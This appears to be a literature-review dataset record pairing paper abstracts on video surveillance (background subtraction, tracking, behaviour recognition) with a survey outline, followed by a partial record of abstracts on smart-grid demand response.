subtraction algorithms paper_content: Locating moving objects in a video sequence is the first step of many computer vision applications. Among the various motion-detection techniques, background subtraction methods are commonly implemented, especially for applications relying on a fixed camera. Since the basic inter-frame difference with global threshold is often a too simplistic method, more elaborate (and often probabilistic) methods have been proposed. These methods often aim at making the detection process more robust to noise, background motion and camera jitter. In this paper, we present commonly-implemented background subtraction algorithms and we evaluate them quantitatively. In order to gauge performances of each method, tests are performed on a wide range of real, synthetic and semi-synthetic video sequences representing different challenges. --- paper_title: Real-time background subtraction for video surveillance: From research to reality paper_content: This paper reviews and evaluates performance of few common background subtraction algorithms which are medianbased, Gaussian-based and Kernel density-based approaches. These algorithms are tested using four sets of image sequences contributed by Wallflower datasets. They are the image sequences of different challenging environments that may reflect the real scenario in video surveillances. The performances of these approaches are evaluated in terms of processing speed, memory usage as well as object segmentation accuracy. The results demonstrate that Gaussian-based approach is the best approach for real-time applications, compromising between accuracy and computational time. Besides, this paper may provide a better understanding of algorithm behaviours implemented in different situation for real-time video surveillance applications. --- paper_title: ViBe: A Universal Background Subtraction Algorithm for Video Sequences paper_content: This paper presents a technique for motion detection that incorporates several innovative mechanisms. For example, our proposed technique stores, for each pixel, a set of values taken in the past at the same location or in the neighborhood. It then compares this set to the current pixel value in order to determine whether that pixel belongs to the background, and adapts the model by choosing randomly which values to substitute from the background model. This approach differs from those based upon the classical belief that the oldest values should be replaced first. Finally, when the pixel is found to be part of the background, its value is propagated into the background model of a neighboring pixel. We describe our method in full details (including pseudo-code and the parameter values used) and compare it to other background subtraction techniques. Efficiency figures show that our method outperforms recent and proven state-of-the-art methods in terms of both computation speed and detection rate. We also analyze the performance of a downscaled version of our algorithm to the absolute minimum of one comparison and one byte of memory per pixel. It appears that even such a simplified version of our algorithm performs better than mainstream techniques. --- paper_title: Moving object detection in spatial domain using background removal techniques -- State-of-art paper_content: Identifying moving objects is a critical task for many computer vision applications; it provides a classification of the pixels into either foreground or background. A common approach used to achieve such classification is background removal. Even though there exist numerous of background removal algorithms in the literature, most of them follow a simple flow diagram, passing through four major steps, which are pre-processing, background modelling, foreground de- tection and data validation. In this paper, we survey many existing schemes in the literature of background removal, sur- veying the common pre-processing algorithms used in different situations, presenting different background models, and the most commonly used ways to update such models and how they can be initialized. We also survey how to measure the performance of any moving object detection algorithm, whether the ground truth data is available or not, presenting per- formance metrics commonly used in both cases. --- paper_title: Multiclass object classification for real-time video surveillance systems paper_content: Object classification in video is an important factor for improving the reliability of various automatic applications in video surveillance systems, as well as a fundamental feature for advanced applications, such as scene understanding. Despite extensive research, existing methods exhibit relatively moderate classification accuracy when tested on a large variety of real-world scenarios, or do not obey the real-time constraints of video surveillance systems. Moreover, their performance is further degraded in multi-class classification problems. We explore multi-class object classification for real-time video surveillance systems and propose an approach for classifying objects in both low and high resolution images (human height varies from a few to tens of pixels) in varied real-world scenarios. Firstly, we present several features that jointly leverage the distinction between various classes. Secondly, we provide a feature-selection procedure based on entropy gain, which screens out superfluous features. Experiments, using various classification techniques, were performed on a large and varied database consisting of ~29,000 object instances extracted from 140 different real-world indoor and outdoor, near-field and far-field scenes having various camera viewpoints, which capture a large variety of object appearances under real-world environmental conditions. The insight raised from the experiments is threefold: the efficiency of our feature set in discriminating between classes, the performance improvement when using the feature selection method, and the high classification accuracy obtained on our real-time system on both DSP (TMS320C6415-6E3, 600MHz) and PC (Quad Core Intel(R) Xeon(R) E5310, 2x4MB Cache, 1.60GHz, 1066MHz) platforms. --- paper_title: Real-time Object Classification in Video Surveillance Based on Appearance Learning paper_content: Classifying moving objects to semantically meaningful categories is important for automatic visual surveillance. However, this is a challenging problem due to the factors related to the limited object size, large intra-class variations of objects in a same class owing to different viewing angles and lighting, and real-time performance requirement in real-world applications. This paper describes an appearance-based method to achieve real-time and robust objects classification in diverse camera viewing angles. A new descriptor, i.e., the multi-block local binary pattern (MB-LBP), is proposed to capture the large-scale structures in object appearances. Based on MB-LBP features, an adaBoost algorithm is introduced to select a subset of discriminative features as well as construct the strong two-class classifier. To deal with the non-metric feature value of MB-LBP features, a multi-branch regression tree is developed as the weak classifiers of the boosting. Finally, the error correcting output code (ECOC) is introduced to achieve robust multi-class classification performance. Experimental results show that our approach can achieve real-time and robust object classification in diverse scenes. --- paper_title: Shape Based Object Classification for Automated Video Surveillance with Feature Selection paper_content: Object classification based on shape features for video surveillance has been a research problem for number of years. The object classification accuracy depends on the type of classifier and the extracted object features used for classification. Excellent classification accuracy can be obtained with an appropriate combination of the extracted features with a particular classifier. In this paper, we propose to use an online feature selection method which gives a good subset of features while the machine learns the classification task and use these selected features for object classification. This paper also explores the impact of different kinds of shape features on the object classification accuracy and the performance of different classifiers in a typical automated video surveillance application. --- paper_title: Adaptive mean-shift for automated multi object tracking paper_content: Mean-shift tracking plays an important role in computer vision applications because of its robustness, ease of implementation and computational efficiency. In this study, a fully automatic multiple-object tracker based on mean-shift algorithm is presented. Foreground is extracted using a mixture of Gaussian followed by shadow and noise removal to initialise the object trackers and also used as a kernel mask to make the system more efficient by decreasing the search area and the number of iterations to converge for the new location of the object. By using foreground detection, new objects entering to the field of view and objects that are leaving the scene could be detected. Trackers are automatically refreshed to solve the potential problems that may occur because of the changes in objects' size, shape, to handle occlusion-split between the tracked objects and to detect newly emerging objects as well as objects that leave the scene. Using a shadow removal method increases the tracking accuracy. As a result, a method that remedies problems of mean-shift tracking and presents an easy to implement, robust and efficient tracking method that can be used for automated static camera video surveillance applications is proposed. Additionally, it is shown that the proposed method is superior to the standard mean-shift. --- paper_title: Bayesian visual surveillance: A model for detecting and tracking a variable number of moving objects paper_content: An automatic detection and tracking framework for visual surveillance is proposed, which is able to handle a variable number of moving objects. Video object detectors generate an unordered set of noisy, false, missing, split, and merged measurements that make extremely complex the tracking task. Especially challenging are split detections (one object is split into several measurements) and merged detections (several objects are merged into one detection). Few approaches address this problem directly, and the existing ones use heuristics methods, or assume a known number of objects, or are not suitable for on-line applications. In this paper, a Bayesian Visual Surveillance Model is proposed that is able to manage undesirable measurements. Particularly, split and merged measurements are explicitly modeled by stochastic processes. Inference is accurately performed through a particle filtering approach that combines ancestral and MCMC sampling. Experimental results have shown a high performance of the proposed approach in real situations. --- paper_title: Multi-Feature Fusion Based Object Detecting and Tracking paper_content: A new approach is proposed to detect and track the moving object. The affine motion model and the non-parameter distribution model are utilized to represent the object firstly. Then the motion region of the object is detected by background difference while Kalman filter estimating its affine motion in next frame. Center association and mean shift are adopted to obtain the observation values. Finally, the distance variance and scale variance between the estimated and detected regions are used to fuse the observation values to acquire the measurement value. To correct fusion errors, the observable edges are employed. Experimental results show that the new method can successfully track the object under such case as merging, splitting, scale variation and scene noise. --- paper_title: Object Tracking and Detecting Based on Adaptive Background Subtraction paper_content: Abstract A tracking algorithm based on adaptive background subtraction about the video detecting and tracking moving objects is presented in this paper. Firstly, we use median filter to achieve the background image of the video and denoise the sequence of video. Then we use adaptive background subtraction algorithm to detect and track the moving objects. Adaptive background updating is also realized in this paper. Finally, we improve the accuracy of tracking through open operation. The simulation results by MATLAB show that the adaptive background subtraction is useful in both detecting and tracking moving objects, and background subtraction algorithm runs more quickly. --- paper_title: Object tracking by detection for video surveillance systems based on modified codebook foreground detection and particle filter paper_content: In this paper, a novel approach is proposed to achieve the multi-object tracking in video surveillance system using a combination of tracking by detection method. For the foreground objects detection part, we implement a modified codebook model. First, the block-based model upgrades the pixel-based codebook model to block level, thus improving the processing speed and reducing memory. Moreover, by adding the orientation and magnitude of the block gradient, the codebook model contains not only information of color, but also the texture feature in order to further reduce noises and refine more entire foreground regions. For the tracking aspect, we further utilize the data from the foreground detection that a color-edgetexture histogram is used by calculate the local binary pattern of the edge of the foreground objects which could have a good performance in describing the shape and texture of the objects. Finally, occlusion solutions strategies are applies to order to overcome the occlusion problems during tracking. Experimental results on different data sets prove that our method has better performance and good real-time ability. --- paper_title: Tracking Pedestrians Using Local Spatio-Temporal Motion Patterns in Extremely Crowded Scenes paper_content: Tracking pedestrians is a vital component of many computer vision applications, including surveillance, scene understanding, and behavior analysis. Videos of crowded scenes present significant challenges to tracking due to the large number of pedestrians and the frequent partial occlusions that they produce. The movement of each pedestrian, however, contributes to the overall crowd motion (i.e., the collective motions of the scene's constituents over the entire video) that exhibits an underlying spatially and temporally varying structured pattern. In this paper, we present a novel Bayesian framework for tracking pedestrians in videos of crowded scenes using a space-time model of the crowd motion. We represent the crowd motion with a collection of hidden Markov models trained on local spatio-temporal motion patterns, i.e., the motion patterns exhibited by pedestrians as they move through local space-time regions of the video. Using this unique representation, we predict the next local spatio-temporal motion pattern a tracked pedestrian will exhibit based on the observed frames of the video. We then use this prediction as a prior for tracking the movement of an individual in videos of extremely crowded scenes. We show that our approach of leveraging the crowd motion enables tracking in videos of complex scenes that present unique difficulty to other approaches. --- paper_title: Research on Detection and Tracking of Moving Target in Intelligent Video Surveillance paper_content: Now the visual surveillance system has been studied extensively, and has made great progress, but many surveillance systems are only applied in specific sites, and the level of intelligence is not high. Intelligent video surveillance system mainly carries out research on techniques of detection and tracking of moving targets, which are very important for detection and understanding of abnormal behaviors, so the effect of moving detection directly affects the overall effect of video surveillance systems, moving detection of intelligent visual surveillance is mainly target classification, tracking, detection, behavior recognition and so on. Detection and tracking of moving targets in surveillance applications has greatly improved intelligence, accuracy and reliability of video surveillance and has greatly reduced the burden on staff. --- paper_title: Automatic human activity recognition in video using background modeling and spatio-temporal template matching based technique paper_content: Human activity recognition is a challenging area of research because of its various potential applications in visual surveillance. A spatio-temporal template matching based approach for activity recognition is proposed in this paper. We model the background in a scene using a simple statistical model and extract the foreground objects in a scene. Spatio-temporal templates are constructed using the motion history images (MHI) and object shape information for different human activities in a video like walking, standing, bending, sleeping and jumping. Experimental results show that the method can recognize these multiple activities for multiple objects with accuracy and speed. --- paper_title: Eigenspace-based fall detection and activity recognition from motion templates and machine learning paper_content: Automatic recognition of anomalous human activities and falls in an indoor setting from video sequences could be an enabling technology for low-cost, home-based health care systems. Detection systems based upon intelligent computer vision software can greatly reduce the costs and inconveniences associated with sensor based systems. In this paper, we propose such a software based upon a spatio-temporal motion representation, called Motion Vector Flow Instance (MVFI) templates, that capture relevant velocity information by extracting the dense optical flow from video sequences of human actions. Automatic recognition is achieved by first projecting each human action video sequence, consisting of approximately 100 images, into a canonical eigenspace, and then performing supervised learning to train multiple actions from a large video database. We show that our representation together with a canonical transformation with PCA and LDA of image sequences provides excellent action discrimination. We also demonstrate that by including both the magnitude and direction of the velocity into the MVFI, sequences with abrupt velocities, such as falls, can be distinguished from other daily human action with both high accuracy and computational efficiency. As an added benefit, we demonstrate that, once trained, our method for detecting falls is robust and we can attain real-time performance. --- paper_title: Event detection and recognition using histogram of oriented gradients and hidden markov models paper_content: This paper presents an approach for object detection and event recognition in video surveillance scenarios. The proposed system utilizes a Histogram of Oriented Gradients (HOG) method for object detection, and a Hidden Markov Model (HMM) for capturing the temporal structure of the features. Decision making is based on the understanding of objects motion trajectory and the relationships between objects' movement and events. The proposed method is applied to recognize events from the public PETS and i-LIDS datasets, which include vehicle events such as U-turns and illegal parking, as well as abandoned luggage recognition established by set of rules. The effectiveness of the proposed solution is demonstrated through extensive experimentation. --- paper_title: A Context Space Model for Detecting Anomalous Behaviour in Video Surveillance paper_content: Having a good automatic anomalous human behaviour ::: detection is one of the goals of smart surveillance ::: systems’ domain of research. The automatic detection addresses several human factor issues underlying the existing surveillance systems. To create such a detection system, contextual information needs to be considered. This is because context is required in order to correctly understand human behaviour. Unfortunately, the use of contextual information is still limited in the automatic anomalous human behaviour detection approaches. This paper proposes a context space model which has two benefits: (a) It provides guidelines for the system designers to select information which can be used to describe context; (b)It enables a system to distinguish between different contexts. A comparative analysis is conducted between a context-based system which employs the proposed context space model and a system which is implemented based on one of the existing approaches. The comparison is applied on a scenario constructed using video clips from CAVIAR dataset. The results show that the context-based system outperforms the other system. This is because the context space model allows the system to considering knowledge learned from the relevant context only. --- paper_title: Video Behavior Profiling for Anomaly Detection paper_content: This paper aims to address the problem of modeling video behavior captured in surveillance videos for the applications of online normal behavior recognition and anomaly detection. A novel framework is developed for automatic behavior profiling and online anomaly sampling/detection without any manual labeling of the training data set. The framework consists of the following key components: 1) A compact and effective behavior representation method is developed based on discrete-scene event detection. The similarity between behavior patterns are measured based on modeling each pattern using a Dynamic Bayesian Network (DBN). 2) The natural grouping of behavior patterns is discovered through a novel spectral clustering algorithm with unsupervised model selection and feature selection on the eigenvectors of a normalized affinity matrix. 3) A composite generative behavior model is constructed that is capable of generalizing from a small training set to accommodate variations in unseen normal behavior patterns. 4) A runtime accumulative anomaly measure is introduced to detect abnormal behavior, whereas normal behavior patterns are recognized when sufficient visual evidence has become available based on an online Likelihood Ratio Test (LRT) method. This ensures robust and reliable anomaly detection and normal behavior recognition at the shortest possible time. The effectiveness and robustness of our approach is demonstrated through experiments using noisy and sparse data sets collected from both indoor and outdoor surveillance scenarios. In particular, it is shown that a behavior model trained using an unlabeled data set is superior to those trained using the same but labeled data set in detecting anomaly from an unseen video. The experiments also suggest that our online LRT-based behavior recognition approach is advantageous over the commonly used Maximum Likelihood (ML) method in differentiating ambiguities among different behavior classes observed online. --- paper_title: Bayesian multi-camera surveillance paper_content: The task of multicamera surveillance is to reconstruct the paths taken by all moving objects that are temporally visible from multiple non-overlapping cameras. We present a Bayesian formalization of this task, where the optimal solution is the set of object paths with the highest posterior probability given the observed data. We show how to efficiently approximate the maximum a posteriori solution by linear programming and present initial experimental results. --- paper_title: Algorithms for Cooperative Multisensor Surveillance paper_content: The Video Surveillance and Monitoring (VSAM) team at Carnegie Mellon University (CMU) has developed an end-to-end, multicamera surveillance system that allows a single human operator to monitor activities in a cluttered environment using a distributed network of active video sensors. Video understanding algorithms have been developed to automatically detect people and vehicles, seamlessly track them using a network of cooperating active sensors, determine their three-dimensional locations with respect to a geospatial site model, and present this information to a human operator who controls the system through a graphical user interface. The goal is to automatically collect and disseminate real-time information to improve the situational awareness of security providers and decision makers. The feasibility of real-time video surveillance has been demonstrated within a multicamera testbed system developed on the campus of CMU. This paper presents an overview of the issues and algorithms involved in creating this semiautonomous, multicamera surveillance system. --- paper_title: Multiple Camera Tracking of Interacting and Occluded Human Motion paper_content: We propose a distributed, real-time computing platform for tracking multiple interacting persons in motion. To combat the negative effects of occlusion and articulated motion we use a multiview implementation, where each view is first independently processed on a dedicated processor. This monocular processing uses a predictor-corrector filter to weigh reprojections of three-dimensional (3-D) position estimates, obtained by the central processor, against observations of measurable image motion. The corrected state vectors from each view provide input observations to a Bayesian belief network, in the central processor, with a dynamic, multidimensional topology that varies as a function of scene content and feature confidence. The Bayesian net fuses independent observations from multiple cameras by iteratively resolving independency relationships and confidence levels within the graph, thereby producing the most likely vector of 3-D state estimates given the available data. To maintain temporal continuity, we follow the network with a layer of Kalman filtering that updates the 3-D state estimates. We demonstrate the efficacy of the proposed system using a multiview sequence of several people in motion. Our experiments suggest that, when compared with data fusion based on averaging, the proposed technique yields a noticeable improvement in tracking accuracy. ---
Title: A Survey Of Activity Recognition And Understanding The Behavior In Video Surveillance Section 1: INTRODUCTION Description 1: This section introduces the study's objective, context, and overview of visual surveillance technologies and their applications. Section 2: SURROUNDING OF MODEL Description 2: This section discusses background modeling techniques and their use in detecting moving objects in video surveillance. Section 3: OBJECT REPRESENTATION AND CLASSIFICATION Description 3: This section covers methods for classifying and representing objects detected in surveillance footage. Section 4: OBJECT TRACKING Description 4: This section elaborates on techniques and challenges associated with tracking objects across video frames. Section 5: DESCRIPTION AND BEHAVIOUR UNDERSTANDING Description 5: This section details methods for understanding and recognizing human actions and behaviors from video data. Section 6: DATA FUSION Description 6: This section explains the importance of data fusion in handling occlusion and ensuring continuous object tracking. Section 7: CONCLUSION Description 7: This section summarizes the current state and future directions of automated video surveillance systems, focusing on behavior analysis and activity recognition.
A Survey on Demand Response Programs in Smart Grids: Pricing Methods and Optimization Algorithms
10
--- paper_title: Optimal Control Policies for Power Demand Scheduling in the Smart Grid paper_content: We study the problem of minimizing the long-term average power grid operational cost through power demand scheduling. A controller at the operator side receives consumer power demand requests with different power requirements, durations and time flexibilities for their satisfaction. Flexibility is modeled as a deadline by which a demand is to be activated. The cost is a convex function of total power consumption, which reflects the fact that each additional unit of power needed to serve demands is more expensive to provision, as demand load increases. We develop a stochastic model and introduce two online demand scheduling policies. In the first one, the Threshold Postponement (TP), the controller serves a new demand request immediately or postpones it to the end of its deadline, depending on current power consumption. In the second one, the Controlled Release (CR), a new request is activated immediately if power consumption is lower than a threshold, else it is queued. Queued demands are activated when deadlines expire or when consumption drops below the threshold. These policies admit an optimal control with switching curve threshold structure, which involves active and postponed demand. The CR policy is asymptotically optimal as deadlines increase, namely it achieves a lower bound on average cost, and the threshold depends only on active demand. Numerical results validate the benefit of our policies compared to the default one of serving demands upon arrival. --- paper_title: Demand response resources: Who is responsible for implementation in a deregulated market? paper_content: Demand response resources (DRR) have potential to offer substantial benefits in the form of improved economic efficiency in wholesale electricity markets. Those benefits include better capacity factors for existing capacity, reductions in requirements for new capacity, enhanced reliability, relief of congestion and transmission constraints, reductions in price volatility, mitigation of market power and lower electricity prices for consumers. However, DRR has been slow to penetrate. There has been substantial disagreement as to which entities in a restructured market should promote the expanded implementation of DRR. This paper contends that no single entity can perform this function. But rather, wider implementation will need to accrue from coordinated actions along the electricity supply chain. --- paper_title: Knowing when to act: an optimal stopping method for smart grid demand response paper_content: A major benefit of the smart grid is that it can provide real-time pricing, which enables residential electricity customers to reduce their electricity expenses by scheduling their appliance use. A commonly utilized technique is to operate electrical appliances when the price of electricity is low. Although this technique is simple in principle and easy to apply, there are several issues that need to be addressed: Studies have shown that residents do not know how, or have the time to take advantage of real-time price information; residents seek to save money by delaying device usage but do not want the inconvenience of long wait times; and a lack of automated energy management systems - industry trials of real-time pricing programs requiring manual user intervention have performed poorly. In this work, we address these issues by the means of an optimal stopping approach, which can balance electricity expense and waiting time. We formulate the problem of deciding when to start home appliances as an optimal stopping problem, and combine optimal stopping rules with appliance energy usage profiles. Our result is an automated residential energy management and scheduling platform, which can reduce energy bills and minimize peak loads. Reduced peak loads result in lower usage rates of dirty coal-based peaker plants, reducing carbon emissions. Additional benefits include lower domestic energy use by controlling vampire loads. Simulation results show that our approach can reduce energy costs by about 10-50 percent depending on the appliance type, and demonstrate the usefulness of our approach in managing residential energy costs. --- paper_title: Demand Side Management: Demand Response, Intelligent Energy Systems, and Smart Loads paper_content: Energy management means to optimize one of the most complex and important technical creations that we know: the energy system. While there is plenty of experience in optimizing energy generation and distribution, it is the demand side that receives increasing attention by research and industry. Demand Side Management (DSM) is a portfolio of measures to improve the energy system at the side of consumption. It ranges from improving energy efficiency by using better materials, over smart energy tariffs with incentives for certain consumption patterns, up to sophisticated real-time control of distributed energy resources. This paper gives an overview and a taxonomy for DSM, analyzes the various types of DSM, and gives an outlook on the latest demonstration projects in this domain. --- paper_title: Impact of demand response on distribution system reliability paper_content: Demand response (DR) is a market driven and sometimes semi-emergency action performed at the utility level or at the Demand Response Service Provider (aggregator) with the objective of reducing the overall demand of the system during peak load hours. If implemented successfully, DR helps postpone the capacity expansion projects related to the distribution network, and provides a collaborative framework for the liberalized energy market of the Smart Grid. Customers subscribed to the DR program are requested to reduce their demand or turn off one or more energy consuming appliances in exchange for financial incentives such as extra payments or discounted electricity rates. This would change the concept of distribution system reliability as is traditionally known. From one hand, DR could lead to a higher amount of unserved energy; on the other hand, it does not qualify as an unwanted lost load. This paper tries to provide a qualitative analysis on the impact of demand response on distribution system reliability. --- paper_title: Demand side management program evaluation based on industrial and commercial field data paper_content: Demand Response is increasingly viewed as an important tool for use by the electric utility industry in meeting the growing demand for electricity. There are two basic categories of demand response options: time varying retail tariffs and incentive Demand Response Programs. Electricity Saudi Company (ESC) is applying the time varying retail tariffs program, which is not suitable according to the studied load curves captured from the industrial and commercial sectors. Different statistical studies on daily load curves for consumers connected to 22kV lines are classified. The load curve criteria used for classification is based on peak ratio and night ratio. The data considered here is a set of 120 annual load curves corresponding to the electric power consumption (the western area in the King Saudi Arabia (KSA)) of many clients in winter and some months in the summer (peak period). The study is based on real data from several Saudi customer sectors in many geographical areas with larger commercial and industrial customers. The study proved that the suitable Demand Response for the ESC is the incentive program. --- paper_title: Autonomous Demand-Side Management Based on Game-Theoretic Energy Consumption Scheduling for the Future Smart Grid paper_content: Most of the existing demand-side management programs focus primarily on the interactions between a utility company and its customers/users. In this paper, we present an autonomous and distributed demand-side energy management system among users that takes advantage of a two-way digital communication infrastructure which is envisioned in the future smart grid. We use game theory and formulate an energy consumption scheduling game, where the players are the users and their strategies are the daily schedules of their household appliances and loads. It is assumed that the utility company can adopt adequate pricing tariffs that differentiate the energy usage in time and level. We show that for a common scenario, with a single utility company serving multiple customers, the global optimal performance in terms of minimizing the energy costs is achieved at the Nash equilibrium of the formulated energy consumption scheduling game. The proposed distributed demand-side energy management strategy requires each user to simply apply its best response strategy to the current total load and tariffs in the power distribution system. The users can maintain privacy and do not need to reveal the details on their energy consumption schedules to other users. We also show that users will have the incentives to participate in the energy consumption scheduling game and subscribing to such services. Simulation results confirm that the proposed approach can reduce the peak-to-average ratio of the total energy demand, the total energy costs, as well as each user's individual daily electricity charges. --- paper_title: A review on distributed energy resources and MicroGrid paper_content: The distributed energy resources (DER) comprise several technologies, such as diesel engines, micro turbines, fuel cells, photovoltaic, small wind turbines, etc. The coordinated operation and control of DER together with controllable loads and storage devices, such as flywheels, energy capacitors and batteries are central to the concept of MicroGrid (MG). MG can operate interconnected to the main distribution grid, or in an islanded mode. This paper reviews the researches and studies on MG technology. The operation of MG and the MG in the market environment are also described in the paper. --- paper_title: Smart Operation of Smart Grid: Risk-Limiting Dispatch paper_content: The drastic reduction of carbon emission to combat global climate change cannot be realized without a significant contribution from the electricity sector. Renewable energy resources must take a bigger share in the generation mix, effective demand response must be widely implemented, and high-capacity energy storage systems must be developed. A smart grid is necessary to manage and control the increasingly complex future grid. Certain smart grid elements-renewables, storage, microgrid, consumer choice, and smart appliances-increase uncertainty in both supply and demand of electric power. Other smart gird elements-sensors, smart meters, demand response, and communications-provide more accurate information about the power system and more refined means of control. Simply building hardware for renewable generators and the smart grid, but still using the same operating paradigm of the grid, will not realize the full potential for overall system efficiency and carbon reduction. In this paper, a new operating paradigm, called risk-limiting dispatch, is proposed. It treats generation as a heterogeneous commodity of intermittent or stochastic power and uses information and control to design hedging techniques to manage the risk of uncertainty. --- paper_title: A summary of demand response in electricity markets paper_content: Abstract This paper presents a summary of Demand Response (DR) in deregulated electricity markets. The definition and the classification of DR as well as potential benefits and associated cost components are presented. In addition, the most common indices used for DR measurement and evaluation are highlighted, and some utilities’ experiences with different demand response programs are discussed. Finally, the effect of demand response in electricity prices is highlighted using a simulated case study. --- paper_title: Demand response in smart electricity grids equipped with renewable energy sources: A review paper_content: Dealing with Renewable Energy Resources (RERs) requires sophisticated planning and operation scheduling along with state of art technologies. Among many possible ways for handling RERs, Demand Response (DR) is investigated in the current review. Because of every other year modifications in DR definition and classification announced by Federal Energy Regulatory Commission (FERC), the latest DR definition and classification are scrutinized in the present work. Moreover, a complete benefit and cost assessment of DR is added in the paper. Measurement and evolution methods along with the effects of DR in electricity prices are discussed. Next comes DR literature review of the recent papers majorly published after 2008. Eventually, successful DR implementations, around the world, are analyzed. --- paper_title: A user-mode distributed energy management architecture for smart grid applications paper_content: Future smart grids will require a flexible, observable, and controllable network architecture for reliable and efficient energy delivery under uncertain conditions. They will also necessitate variability in distributed energy generators and demand-side loads. This study presents a tree-like user-mode network architecture responding to these requirements. The approaches presented for the next-generation grid architecture facilitate the management of distributed generation strategies based on renewable sources, distributed storage, and demand-side load management. --- paper_title: Demand Response and Electricity Market Efficiency paper_content: Customer response is a neglected way of solving electricity industry problems. Historically, providers have focused on supply, assuming that consumers are unwilling or unable to modify their consumption. Contrary to these expectations, customers respond to higher prices that they expect to continue by purchasing more efficient appliances and taking other efficiency measures, a review of published studies indicates. --- paper_title: Demand response and smart grids—A survey paper_content: The smart grid is conceived of as an electric grid that can deliver electricity in a controlled, smart way from points of generation to active consumers. Demand response (DR), by promoting the interaction and responsiveness of the customers, may offer a broad range of potential benefits on system operation and expansion and on market efficiency. Moreover, by improving the reliability of the power system and, in the long term, lowering peak demand, DR reduces overall plant and capital cost investments and postpones the need for network upgrades. In this paper a survey of DR potentials and benefits in smart grids is presented. Innovative enabling technologies and systems, such as smart meters, energy controllers, communication systems, decisive to facilitate the coordination of efficiency and DR in a smart grid, are described and discussed with reference to real industrial case studies and research projects. --- paper_title: Coordinating Storage and Demand Response for Microgrid Emergency Operation paper_content: Microgrids are assumed to be established at the low voltage distribution level, where distributed energy sources, storage devices, controllable loads and electric vehicles are integrated in the system and need to be properly managed. The microgrid system is a flexible cell that can be operated connected to the main power network or autonomously, in a controlled and coordinated way. The use of storage devices in microgrids is related to the provision of some form of energy buffering during autonomous operating conditions, in order to balance load and generation. However, frequency variations and limited storage capacity might compromise microgrid autonomous operation. In order to improve microgrid resilience in the moments subsequent to islanding, this paper presents innovative functionalities to run online, which are able to manage microgrid storage considering the integration of electric vehicles and load responsiveness. The effectiveness of the proposed algorithms is validated through extensive numerical simulations. --- paper_title: Intelligent unit commitment with vehicle-to-grid —A cost-emission optimization paper_content: A gridable vehicle (GV) can be used as a small portable power plant (S3P) to enhance the security and reliability of utility grids. Vehicle-to-grid (V2G) technology has drawn great interest in the recent years and its success depends on intelligent scheduling of GVs or S3Ps in constrained parking lots. V2G can reduce dependencies on small expensive units in existing power systems, resulting in reduced operation cost and emissions. It can also increase reserve and reliability of existing power systems. Intelligent unit commitment (UC) with V2G for cost and emission optimization in power system is presented in this paper. As number of gridable vehicles in V2G is much higher than small units of existing systems, UC with V2G is more complex than basic UC for only thermal units. Particle swarm optimization (PSO) is proposed to balance between cost and emission reductions for UC with V2G. PSO can reliably and accurately solve this complex constrained optimization problem easily and quickly. In the proposed solution model, binary PSO optimizes on/off states of power generating units easily. Vehicles are presented by integer numbers instead of zeros and ones to reduce the dimension of the problem. Balanced hybrid PSO optimizes the number of gridable vehicles of V2G in the constrained parking lots. Balanced PSO provides a balance between local and global searching abilities, and finds a balance in reducing both operation cost and emission. Results show a considerable amount of cost and emission reduction with intelligent UC with V2G. Finally, the practicality of UC with V2G is discussed for real-world applications. --- paper_title: Smart Grid Communications: Overview of Research Challenges, Solutions, and Standardization Activities paper_content: Optimization of energy consumption in future intelligent energy networks (or Smart Grids) will be based on grid-integrated near-real-time communications between various grid elements in generation, transmission, distribution and loads. This paper discusses some of the challenges and opportunities of communications research in the areas of smart grid and smart metering. In particular, we focus on some of the key communications challenges for realizing interoperable and future-proof smart grid/metering networks, smart grid security and privacy, and how some of the existing networking technologies can be applied to energy management. Finally, we also discuss the coordinated standardization efforts in Europe to harmonize communications standards and protocols. --- paper_title: 1 Smart Distribution: Coupled Microgrids paper_content: The distribution system provides major opportunities for smart grid concepts. One way to approach distribution system problems is to rethinking our distribution system to include the integration of high levels of distributed energy resources, using microgrid concepts. Basic objectives are improved reliability, promote high penetration of renewable sources, dynamic islanding, and improved generation efficiencies through the use of waste heat. Managing significant levels of distributed energy resources (DERs) with a wide and dynamic set of resources and control points can become overwhelming. The best way to manage such a system is to break the distribution system down into small clusters or microgrids, with distributed optimizing controls coordinating multimicrogrids. The Consortium for Electric Reliability Technology Solutions (CERTSs) concept views clustered generation and associated loads as a grid resource or a “microgrid.” The clustered sources and loads can operate in parallel to the grid or as an island. This grid resource can disconnect from the utility during events (i.e., faults, voltage collapses), but may also intentionally disconnect when the quality of power from the grid falls below certain standards. This paper focuses on DER-based distribution, the basics of microgrids, possibility of smart distribution systems using coupled microgrid and the current state of autonomous microgrid technology. --- paper_title: Autonomous Distributed V2G (Vehicle-to-Grid) Satisfying Scheduled Charging paper_content: To integrate large scale renewable energy sources in the power grid, the battery energy storage performs an important role for smoothing their natural intermittency and ensuring grid-wide frequency stability. Electric vehicles have not only large introduction potential but also much available time for control because they are almost plugged in the home outlets as distributed battery energy storages. Therefore, vehicle-to-grid (V2G) is expected to be one of the key technologies in smart grid strategies. This paper proposes an autonomous distributed V2G control scheme. A grid-connected electric vehicle supplies a distributed spinning reserve according to the frequency deviation at the plug-in terminal, which is a signal of supply and demand imbalance in the power grid. As a style of EV utilization, it is assumed that vehicle use set next plug-out timing in advance. In such assumption, user convenience is satisfied by performing a scheduled charging for the plug-out, and plug-in idle time is available for the V2G control. Therefore a smart charging control is considered in the proposed scheme. Satisfaction of vehicle user convenience and effect to the load frequency control is evaluated through a simulation by using a typical two area interconnected power grid model and an automotive lithium-ion battery model. --- paper_title: Pool-Based Demand Response Exchange—Concept and Modeling paper_content: In restructured power systems, there are many independent players who benefit from demand response (DR). These include the transmission system operator (TSO), distributors, retailers, and aggregators. This paper proposes a new concept-demand response eXchange (DRX)-in which DR is treated as a public good to be exchanged between DR buyers and sellers. Buyers need DR to improve the reliability of their own electricity-dependent businesses and systems. Sellers have the capacity to significantly modify electricity demand on request. Microeconomic theory is applied to model the DRX in the form of a pool-based market. In this market, a DRX operator (DRXO) collects DR bids and offers from the buyers and sellers, respectively. It then clears the market by maximizing the total market benefit subject to certain constraints including: demand-supply balance, and assurance contracts related to individual buyer contributions for DR. The DRX model is also tested on a small power system, and its efficiency is reported. --- paper_title: Distributed Demand and Response Algorithm for Optimizing Social-Welfare in Smart Grid paper_content: This paper presents a distributed Demand and Response algorithm for smart grid with the objective of optimizing social-welfare. Assuming the power demand range is known or predictable ahead of time, our proposed distributed algorithm will calculate demand and response of all participating energy demanders and suppliers, as well as energy flow routes, in a fully distributed fashion, such that the social-welfare is optimized. During the computation, each node (e.g., demander or supplier) only needs to exchange limited rounds of messages with its neighboring nodes. It provides a potential scheme for energy trade among 